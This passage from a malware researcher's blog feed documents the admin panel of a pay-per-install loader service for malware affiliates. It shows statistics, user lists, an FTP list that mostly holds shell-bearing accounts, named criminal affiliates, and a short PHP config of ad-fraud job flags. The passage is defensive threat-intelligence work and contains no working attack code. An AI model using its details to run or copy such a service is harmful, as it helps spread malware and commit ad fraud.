&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO0FW9sq8p8KIRuGcA5e_e5xulHJrXXvvOfKLAubOI0eYZ1k4Cb3gPN0KnWI6FbkX9EU75l_9NBRRkemPNSQYoQB03rKzllgiEkFanA2_SnMRTkPVjSZGjlA8U3wMBNfcpi0BwQrjcawg/s1600/15-07-2013+14-29-41.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO0FW9sq8p8KIRuGcA5e_e5xulHJrXXvvOfKLAubOI0eYZ1k4Cb3gPN0KnWI6FbkX9EU75l_9NBRRkemPNSQYoQB03rKzllgiEkFanA2_SnMRTkPVjSZGjlA8U3wMBNfcpi0BwQrjcawg/s400/15-07-2013+14-29-41.png&quot; height=&quot;206&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
(Date, Unique visits, General visits)&lt;br /&gt;
&lt;br /&gt;
Statistics by countries:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHtOjwDTTUc05U8Z3FetucQ0-nlmAYbqUpEgB6dOAsqEISGBWO4mJ8lSFhxjizgA-OvDcEQwDrW8bWBO_s-u6fMFAi1aHPDDhw3tgSzeZxeN6S_H4wp6Usfun-O0CtylWWRwUX-V_KsNg/s1600/15-07-2013+14-42-34.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHtOjwDTTUc05U8Z3FetucQ0-nlmAYbqUpEgB6dOAsqEISGBWO4mJ8lSFhxjizgA-OvDcEQwDrW8bWBO_s-u6fMFAi1aHPDDhw3tgSzeZxeN6S_H4wp6Usfun-O0CtylWWRwUX-V_KsNg/s400/15-07-2013+14-42-34.png&quot; height=&quot;145&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
(Countries, Unique visits, Percentage, General visits)&lt;br /&gt;
&lt;br /&gt;
Statistics by version:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsAqMsjJdVfs8aJTVPL-fQsS4Y4j3EfSKWYjNLEpbt0faso1MtuGy11TRqY3KgJw1jdGCY4b94RHb4pKkt1d0ztNKmTMu0joK67T5QLs0LURoVTV_8GsVL7boUiOUepH7O_rE8sz_I_iI/s1600/15-07-2013+14-50-07.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsAqMsjJdVfs8aJTVPL-fQsS4Y4j3EfSKWYjNLEpbt0faso1MtuGy11TRqY3KgJw1jdGCY4b94RHb4pKkt1d0ztNKmTMu0joK67T5QLs0LURoVTV_8GsVL7boUiOUepH7O_rE8sz_I_iI/s400/15-07-2013+14-50-07.png&quot; height=&quot;231&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
(Version, Unique visits, Percentage, General visits)&lt;br /&gt;
&lt;br /&gt;
Statistics by time:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigrpzbQIjuZ9m3qdyaCo7qKKJGQYUwXqxUUVstoHrka04BvLEi3kMItMUgV_mggH_R0vA4a9d6JR2ScyDnPvj6w71VxnaXaKAAPezw7XZ87iOPXklnwFDpl6jepLoO5lscS4gml2zltrY/s1600/15-07-2013+14-55-16.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigrpzbQIjuZ9m3qdyaCo7qKKJGQYUwXqxUUVstoHrka04BvLEi3kMItMUgV_mggH_R0vA4a9d6JR2ScyDnPvj6w71VxnaXaKAAPezw7XZ87iOPXklnwFDpl6jepLoO5lscS4gml2zltrY/s320/15-07-2013+14-55-16.png&quot; height=&quot;172&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
(Time,&amp;nbsp; Users)&lt;br /&gt;
&lt;br /&gt;
Downloads:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-5KFjcdaKJ0J4WmzeErSn-W9kcpUi5WDaK7lLXd7u-O67VkbgOqDTT7gCQr_zJirEScYaV4RKKnQaPuPcioZ0Wzg9ins3h4g2BJobni8drmHBC6Geu4kibZswAfExzITFh29yg_s7jwc/s1600/15-07-2013+14-56-15.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-5KFjcdaKJ0J4WmzeErSn-W9kcpUi5WDaK7lLXd7u-O67VkbgOqDTT7gCQr_zJirEScYaV4RKKnQaPuPcioZ0Wzg9ins3h4g2BJobni8drmHBC6Geu4kibZswAfExzITFh29yg_s7jwc/s400/15-07-2013+14-56-15.png&quot; height=&quot;215&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
(Date, Already installed, ???? installed, Successfully installed, Copy failed, Modify failed, Register failed)&lt;br /&gt;
&lt;br /&gt;
Updates:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0rMee-7pdWouT0eRULJlNE5WtWMmC5C__WuifvL-wugMRqQ46PmZdh66tvY-Y-YfqTSUqbTiTmPDGEXcQOncHpqkj17aMWt5zvLppsr8lJWmXeOK3nSZYg82MIxY1K8mcL60Mwhyphenhyphen_HwY/s1600/15-07-2013+14-57-40.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0rMee-7pdWouT0eRULJlNE5WtWMmC5C__WuifvL-wugMRqQ46PmZdh66tvY-Y-YfqTSUqbTiTmPDGEXcQOncHpqkj17aMWt5zvLppsr8lJWmXeOK3nSZYg82MIxY1K8mcL60Mwhyphenhyphen_HwY/s400/15-07-2013+14-57-40.png&quot; height=&quot;215&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
(Date, Begin update, Downloaded update, Executed update, No ATL, Execution failed)&lt;br /&gt;
&lt;br /&gt;
Statistics by tasks:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9JG0_2DMJtICBGIIvEuSjPWwa1eTchGQUrkgl732kwUhM6cGDwg4XpInHkIUtrTX8t_q91PgQPck7_7HcJuuhqlEgoyGQ-OsM9lqNwz90sBSRoabgOgOAPCbKxo-ROyJZl4IQYC5mtl0/s1600/15-07-2013+14-59-13.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9JG0_2DMJtICBGIIvEuSjPWwa1eTchGQUrkgl732kwUhM6cGDwg4XpInHkIUtrTX8t_q91PgQPck7_7HcJuuhqlEgoyGQ-OsM9lqNwz90sBSRoabgOgOAPCbKxo-ROyJZl4IQYC5mtl0/s400/15-07-2013+14-59-13.png&quot; height=&quot;320&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
(Date, Start of xxxx, Searches, Clicks, ???)&lt;br /&gt;
&lt;br /&gt;
Statistics by sites:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8nKZ7xNlxAMYcEK2Br4dck7S8YMG0a0bEZZH6PAnJ2vmDbVP0tRlQTEATKTP3XN-LDWpYy5TVjwNtQG7kiGQmVsA8Gj1bhbn4eMauCHp-_qDaGXxf47pF89M3-7B_DBNlCoicN0w3EUk/s1600/15-07-2013+15-00-53.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8nKZ7xNlxAMYcEK2Br4dck7S8YMG0a0bEZZH6PAnJ2vmDbVP0tRlQTEATKTP3XN-LDWpYy5TVjwNtQG7kiGQmVsA8Gj1bhbn4eMauCHp-_qDaGXxf47pF89M3-7B_DBNlCoicN0w3EUk/s400/15-07-2013+15-00-53.png&quot; height=&quot;207&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Statistics by ads:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmkYxfH9HGN-4-4mvWVNmQzsIBpNiHdUS30yaTYX5IVb3kkBzIdrjO1wfxTNv98yiw9sicAo4cAl0bvpsQEF-HrnCgakwa3vSth3do1Jce8WalK6tsxYa035SerRFeE0WezVgoG3iZ3QY/s1600/15-07-2013+15-02-36.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmkYxfH9HGN-4-4mvWVNmQzsIBpNiHdUS30yaTYX5IVb3kkBzIdrjO1wfxTNv98yiw9sicAo4cAl0bvpsQEF-HrnCgakwa3vSth3do1Jce8WalK6tsxYa035SerRFeE0WezVgoG3iZ3QY/s320/15-07-2013+15-02-36.png&quot; height=&quot;276&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Loader, users list:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxol7NsVq0tYABh3CvZfR7H98eeq99T6ljPT2azmLO0058BvbbMT07MmdyR_2raEUis2rTMkr3L9ZYAxgXlYIHgRmdWdUkIevYdoE8O51ir9JYiDMDEXyR1welpI_o0EVRQ3XecaSu0Q8/s1600/15-07-2013+15-35-20.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxol7NsVq0tYABh3CvZfR7H98eeq99T6ljPT2azmLO0058BvbbMT07MmdyR_2raEUis2rTMkr3L9ZYAxgXlYIHgRmdWdUkIevYdoE8O51ir9JYiDMDEXyR1welpI_o0EVRQ3XecaSu0Q8/s400/15-07-2013+15-35-20.png&quot; height=&quot;320&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAzgJMV-0r88CqpiRRBKoGh1JF8yDU8Kr2IQnEpPflduNyxTf-b65PInbEZugtMGOnAvK_1hgjIXjO7MEaidmfp9BxdLFETqXeHpMUKN4KRQvGuEuts5VWvN-agsPgg26stWEXV5MQTow/s1600/15-07-2013+15-36-14.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAzgJMV-0r88CqpiRRBKoGh1JF8yDU8Kr2IQnEpPflduNyxTf-b65PInbEZugtMGOnAvK_1hgjIXjO7MEaidmfp9BxdLFETqXeHpMUKN4KRQvGuEuts5VWvN-agsPgg26stWEXV5MQTow/s400/15-07-2013+15-36-14.png&quot; height=&quot;320&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_U1qwftPwt868QHyLx5ef2MAEY_X1iAN5pRnQopUCRIqGdWEgulmKuSWcvbrAjy-GKIijtJluJ0lJqhbTZXp8QBTJ7Ytub4XH1RdnAiIznIkYCokkRjWg4Wk9L8AyChTp6CGj1Ljxvtk/s1600/15-07-2013+15-37-00.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_U1qwftPwt868QHyLx5ef2MAEY_X1iAN5pRnQopUCRIqGdWEgulmKuSWcvbrAjy-GKIijtJluJ0lJqhbTZXp8QBTJ7Ytub4XH1RdnAiIznIkYCokkRjWg4Wk9L8AyChTp6CGj1Ljxvtk/s1600/15-07-2013+15-37-00.png&quot; height=&quot;320&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;(Nickname, ID, Priority, Ban, GEO, Days, General limit, Working conditions, Today, Summary, Size, Time, File)&lt;br /&gt;
&lt;br /&gt;
There is some interesting people in this listing:&lt;br /&gt;
&lt;a href=&quot;http://www.xylibox.com/2011/06/tracking-cyber-crime-severa.html&quot;&gt;Severa&lt;/a&gt; (Know for FakeAV, Spam)&lt;br /&gt;
&lt;a href=&quot;http://www.blogger.com/&quot;&gt;&lt;span id=&quot;goog_1082891782&quot;&gt;&lt;/span&gt;&lt;/a&gt;&lt;a href=&quot;http://www.xylibox.com/2011/11/tracking-cyber-crime-malwox-win32cidox.html&quot;&gt;Malwox&lt;/a&gt;&lt;a href=&quot;http://www.xylibox.com/2011/11/tracking-cyber-crime-malwox-win32cidox.html&quot;&gt;&lt;span id=&quot;goog_1082891783&quot;&gt;&lt;/span&gt; Affiliate&lt;/a&gt; (Mayachok.1)&lt;br /&gt;
&lt;a href=&quot;http://www.xylibox.com/2013/07/feodalcash-affiliate-trojanwin32tarcloin.html&quot;&gt;Feodal cash Affiliate&lt;/a&gt; (Bitcoin malware)&lt;br /&gt;
&lt;br /&gt;
And if you want to know about the EXE files loaded... all are malwares (Zeus,SpyEye, Russian lockers, Spam bots, Mayachok... etc..)&lt;br /&gt;
The x64 Zbot covered by Kaspersky also come from here.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtBQGgx60qreJl5NwPtTxc4QhtrXh-0G0RYYH4rW3LpUJ3DoelOUio627uCLlQ2JFCV12GpR7CVhOOMGcghriZNd_YTlhVDCHcQKWsLIL0xIFtzfHAuQRyaeJsKsgstrCMHD2XcuftV3I/s1600/LwUMY5b.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtBQGgx60qreJl5NwPtTxc4QhtrXh-0G0RYYH4rW3LpUJ3DoelOUio627uCLlQ2JFCV12GpR7CVhOOMGcghriZNd_YTlhVDCHcQKWsLIL0xIFtzfHAuQRyaeJsKsgstrCMHD2XcuftV3I/s400/LwUMY5b.png&quot; height=&quot;208&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFtE6n3xIYx0TSYj79Jooy667r0ADfQT23Kk_UBQe5L05VTzc-lrofujIc5NxaI8EBAs-MghDIYNlmibv5si4dfGkwGMEnMxln6VHdUb-v4fu5HCC6vWlu1Edg6EfOtwJ8KWqm_MgoX2k/s1600/b84DGOa.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFtE6n3xIYx0TSYj79Jooy667r0ADfQT23Kk_UBQe5L05VTzc-lrofujIc5NxaI8EBAs-MghDIYNlmibv5si4dfGkwGMEnMxln6VHdUb-v4fu5HCC6vWlu1Edg6EfOtwJ8KWqm_MgoX2k/s400/b84DGOa.png&quot; height=&quot;228&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB9TrxQimmgPuetWx4osVJpduQzAKPwRzkcTBGyuqGAloVStks4TO2WJzjC_moIxZh856AdjB9Y3yoK7BD_2z7NoFJYj4tAQ1hpzOnzmLP1YqibTRtPMlHdYGRsHbNmgkIKpM7JXt6qfo/s1600/S429X9C.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB9TrxQimmgPuetWx4osVJpduQzAKPwRzkcTBGyuqGAloVStks4TO2WJzjC_moIxZh856AdjB9Y3yoK7BD_2z7NoFJYj4tAQ1hpzOnzmLP1YqibTRtPMlHdYGRsHbNmgkIKpM7JXt6qfo/s400/S429X9C.png&quot; height=&quot;227&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;a href=&quot;http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;amp;t=1363&amp;amp;start=50#p19625&quot;&gt;http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;amp;t=1363&amp;amp;start=50#p19625&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;amp;t=648&amp;amp;start=40#p19621&quot;&gt;http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;amp;t=648&amp;amp;start=40#p19621&lt;/a&gt;&lt;br /&gt;
The executables was rotating and was refreshed constantly, from this system, around 400 samples can be pulled per day.&lt;br /&gt;
&lt;br /&gt;
Download statistics for client 191 ( Malwox TEST ):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEIbGJTsvUfFcteXmYxVgz9wsNsTuNt4z-2RZ2D_1PSMXtDXi8qR3vuOIYpHLOrbXWiVLmQyXfUX3vk8hBB49Ip6Pqo2xNj46s1H_VndzqG6wglaYJZhDxlbmnD0wPCGstVG_qSi22_Ng/s1600/15-07-2013+15-47-44.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEIbGJTsvUfFcteXmYxVgz9wsNsTuNt4z-2RZ2D_1PSMXtDXi8qR3vuOIYpHLOrbXWiVLmQyXfUX3vk8hBB49Ip6Pqo2xNj46s1H_VndzqG6wglaYJZhDxlbmnD0wPCGstVG_qSi22_Ng/s400/15-07-2013+15-47-44.png&quot; height=&quot;321&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
(Date,&amp;nbsp; Derved, Executed, Ctr, Create, Exists, Down, Run, Unp)&lt;br /&gt;
&lt;br /&gt;
Edit user:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_lnh2gPwhFuq0O2Nr_LbBvlX9Q_XfLwheKTUscoL0o62ZB2jK4ruf1PTJymV6nu0wGkNi_VycavsFOeMUdKFfUIbeC6gfyBPpZrSNryhvP39ZUSIQj5_s5nlbVeGgiN86GpdQMWSvtZg/s1600/15-07-2013+15-45-55.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_lnh2gPwhFuq0O2Nr_LbBvlX9Q_XfLwheKTUscoL0o62ZB2jK4ruf1PTJymV6nu0wGkNi_VycavsFOeMUdKFfUIbeC6gfyBPpZrSNryhvP39ZUSIQj5_s5nlbVeGgiN86GpdQMWSvtZg/s400/15-07-2013+15-45-55.png&quot; height=&quot;400&quot; width=&quot;305&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
Add user:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjngcDJTE9bxtfAgtmHBCkCjoUxb85iV4fLSeGJF_I-mD0uVObEPrbLnMVVR8jpeTb5raA0kvCGy0ZTfpy9p-b3Hs5OuBlC_l-P-OlaRgUb6R-MGSSGfXU_ee6TS1tzEotebUJDM8y7gVM/s1600/15-07-2013+15-39-18.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjngcDJTE9bxtfAgtmHBCkCjoUxb85iV4fLSeGJF_I-mD0uVObEPrbLnMVVR8jpeTb5raA0kvCGy0ZTfpy9p-b3Hs5OuBlC_l-P-OlaRgUb6R-MGSSGfXU_ee6TS1tzEotebUJDM8y7gVM/s400/15-07-2013+15-39-18.png&quot; height=&quot;302&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Schedule for user:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcbftY-1lSe7Uawah8Kc6cf8EHeag3HmTcMyUnE5mbizK6Pc28RhxelHE2OWCZrtDvnx9VfQrnqYVa1i4TYyegWp20yAsRRsddz9acKT6vbGYSec0gUREROj_buyEmQws0oPorKe11qUg/s1600/15-07-2013+15-39-59.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcbftY-1lSe7Uawah8Kc6cf8EHeag3HmTcMyUnE5mbizK6Pc28RhxelHE2OWCZrtDvnx9VfQrnqYVa1i4TYyegWp20yAsRRsddz9acKT6vbGYSec0gUREROj_buyEmQws0oPorKe11qUg/s400/15-07-2013+15-39-59.png&quot; height=&quot;321&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
FTP:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2j1t58b-Xh2K_wMo1Hx9BXacCXJFoLEGWYAozvlkVLSn-U3srzSN-fHksEzW29CUQzNvLO-kg73R4RykjXzum4ka2BX4k8cTpk6bbtCxbC61wucVfphWScR-Qvf6fjRLfFRt_fcwOlZ0/s1600/15-07-2013+15-40-49.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2j1t58b-Xh2K_wMo1Hx9BXacCXJFoLEGWYAozvlkVLSn-U3srzSN-fHksEzW29CUQzNvLO-kg73R4RykjXzum4ka2BX4k8cTpk6bbtCxbC61wucVfphWScR-Qvf6fjRLfFRt_fcwOlZ0/s400/15-07-2013+15-40-49.png&quot; height=&quot;321&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Menu: users list, add, FTP, Stats.&lt;br /&gt;
&lt;br /&gt;
For the FTP list, most of accounts were with shell on them.&lt;br /&gt;
&lt;br /&gt;
Structure: &lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4zIfM_SXHfa2N8fTFlLDXVMvaiBdmzNxct2O55odOpxf47Lt7NV31dqLNOmebS-odKH-8IJm7YTH-XgD4iIfS3Cl4cHGDGDaioBoUZeD56ld608l_qZvi91YsxdDo9ZlJhRETKcZ4qRs/s1600/2014-05-05_13-01-30.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4zIfM_SXHfa2N8fTFlLDXVMvaiBdmzNxct2O55odOpxf47Lt7NV31dqLNOmebS-odKH-8IJm7YTH-XgD4iIfS3Cl4cHGDGDaioBoUZeD56ld608l_qZvi91YsxdDo9ZlJhRETKcZ4qRs/s1600/2014-05-05_13-01-30.png&quot; height=&quot;290&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
From the source:&lt;br /&gt;
&lt;div class=&quot;php&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
&lt;span style=&quot;color: #000088;&quot;&gt;$useZorkaJob&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #cc66cc;&quot;&gt;0&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt; &lt;span style=&quot;color: #666666; font-style: italic;&quot;&gt;//схч чрїюфр&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #000088;&quot;&gt;$useSputnikJob&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #cc66cc;&quot;&gt;0&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #000088;&quot;&gt;$useRekloJob&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #cc66cc;&quot;&gt;0&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #000088;&quot;&gt;$useSpoiskJob&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #cc66cc;&quot;&gt;0&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #000088;&quot;&gt;$useBegunCheatJob&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #cc66cc;&quot;&gt;0&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;
Begun is one of the biggest ads services in Russia.</description><link>https://www.xylibox.com/2014/05/install-service-for-malware-affiliates.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCsgtqpgKKmpIg7FWkHDSbUwOt6vPw3wDSyPwdIgww6WiQjJ-RK3I1POvAR9sqd06uBvY8DDJwNq_PlZtiN3irm2Kdxsb9RmXYX6y5CzmyxS4uLo0yxzwCfnnh9pKJE6gct5Ej_jWwqC4/s72-c/15-07-2013+14-28-03.png" height="72" width="72"/><thr:total>5</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-3555705715129142971</guid><pubDate>Sat, 03 May 2014 23:12:00 +0000</pubDate><atom:updated>2014-05-04T01:12:40.465+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">ATS</category><category domain="http://www.blogger.com/atom/ns#">ATSEngine</category><category domain="http://www.blogger.com/atom/ns#">Bc5rw12</category><category domain="http://www.blogger.com/atom/ns#">Man in the browser</category><category domain="http://www.blogger.com/atom/ns#">MITB</category><category domain="http://www.blogger.com/atom/ns#">Webinject</category><category 